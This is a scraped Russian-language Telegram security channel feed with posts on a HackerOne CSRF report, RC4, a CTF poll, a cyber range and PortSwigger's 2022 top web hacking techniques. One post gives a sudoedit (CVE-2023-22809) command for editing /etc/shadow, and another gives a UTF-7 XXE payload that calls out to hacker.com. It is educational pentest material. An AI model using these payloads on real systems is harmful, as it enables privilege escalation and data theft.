Всем привет! С Вами wr3dmast3r, и сегодня мы разберем репорт с HackerOne.
Сегодняшняя уязвимость связана с CSRF и подделкой запросов для создания привилегированного пользователя
Читать
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
ReportHackerOne - CSRF
Всем привет! С Вами wr3dmast3r, и сегодня мы разберем репорт с HackerOne. Сегодняшняя уязвимость связана с CSRF и подделкой запросов для создания привилегированного пользователя. Суть уязвимости. Можно заставить пользователя отправить любой POST-запрос с…
👍18🔥5😈2👨💻1
Немного материала из курса.
Стек основных протоколов.
RESOLUTE ATTACK
Please open Telegram to view this post
VIEW IN TELEGRAM
👍37🔥8🤩5🤣3⚡2🤔1
Всем привет, на связи SidneyJob, в этой статье я хотел бы показать один очень интересный способ поточного шифрования RC4!
Читать
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
RC4
Всем привет, на связи SidneyJob, в этой статье я хотел бы показать один очень интересный способ поточного шифрования RC4! Итак, начнем с теории RC4 как и любой потоковый шифр строится на основе генератора псевдослучайных битов. RC4 также известен как ARC4…
👍15🔥4❤2😍2
Запустить ли CTF среди подписчиков?
Anonymous Poll
54%
Да
15%
Конечно, погнали
31%
Погнали с командой RED TEAM и BLUE TEAM
🕊4👍2
Скоро будет очень интересно, дайте нам время
На контент времени не хватает 🤗
На контент времени не хватает 🤗
👍27
Forwarded from RedTeam Notes (Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit 𓅓...)
Для эксплуатации уязвимости CVE-2023-22809 у пользователя, под которым вы залогинены, должно быть разрешение на изменение какого-либо файла при помощи sudoedit или sudo -e.
Так выглядит один из примеров уязвимой конфигурации /etc/sudoers (Рисунок 1)
Для проверки прав пользователя можно исполнить команду sudo -l (Рисунок 2)
Далее создаем команду для эксплуатации: EDITOR='vi -- /etc/shadow' sudoedit /etc/custom/service.conf
(Вы можете поменять vi на любой редактор текста доступный в системе. Так же файл /etc/shadow можно поменять на любой, необходимый для изменения. Файл /etc/custom/service.conf варируется в зависимости от прав пользователя (Рисунок 2))
Так выглядит один из примеров уязвимой конфигурации /etc/sudoers (Рисунок 1)
Для проверки прав пользователя можно исполнить команду sudo -l (Рисунок 2)
Далее создаем команду для эксплуатации: EDITOR='vi -- /etc/shadow' sudoedit /etc/custom/service.conf
(Вы можете поменять vi на любой редактор текста доступный в системе. Так же файл /etc/shadow можно поменять на любой, необходимый для изменения. Файл /etc/custom/service.conf варируется в зависимости от прав пользователя (Рисунок 2))
👍16🔥6❤1👨💻1
<?xml version="1.0" encoding="UTF-7"?>Для преобразования между UTF-8 и UTF-7 используйте recode.
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hacker.com:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
recode UTF8..UTF7 payload-file.xml
UTF-7 (формат преобразования Unicode - 7-bit) - это кодировка символов, которая позволяет кодировать определенные символы ASCII, используя только 7-битные кодовые единицы.Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤6🔥2
🤔18👍11
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥37😍8👍7🤔2⚡1
Киберполигон направлен на обучение командной работе. Если ты «защитник», то научишься обнаруживать нежелательные события в сети, разбирать их с командой, анализировать инциденты, реагировать и устранять их правильным образом и в срок.
Если ты в команде нападающих (пентестер, багхантер, внутренний специалист), то в тренировках ты учишься не только взламывать, но и правильно документировать отчеты об уязвимостях и составлять рекомендации для их устранения.
Ссылка на новость
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩27🔥10👍8🤣7🤔1
PortSwigger's топ 10 веб хакинг техник 2022
В течение последних двух недель экспертная группа в составе исследователей: Николя Грегуара, Соруша Далили, Filedescriptor обсудила и проанализировализа 15 изумительных техник, чтобы представить вам 10 лучших новых методов веб-взлома 2022 года.
🔤 Account hijacking using dirty dancing in sign-in OAuth-flows
🔤 Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling
🔤 Zimbra Email - Stealing Clear-Text Credentials via Memcache injection
🔤 Hacking the Cloud with SAML
🔤 Bypassing .NET Serialization Binders
🔤 Making HTTP header injection critical via response queue poisoning
🔤 Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes
🔤 Psychic Signatures in Java
🔤 Practical client-side path-traversal attacks
🔤 🔤 Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library
В течение последних двух недель экспертная группа в составе исследователей: Николя Грегуара, Соруша Далили, Filedescriptor обсудила и проанализировализа 15 изумительных техник, чтобы представить вам 10 лучших новых методов веб-взлома 2022 года.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍7⚡3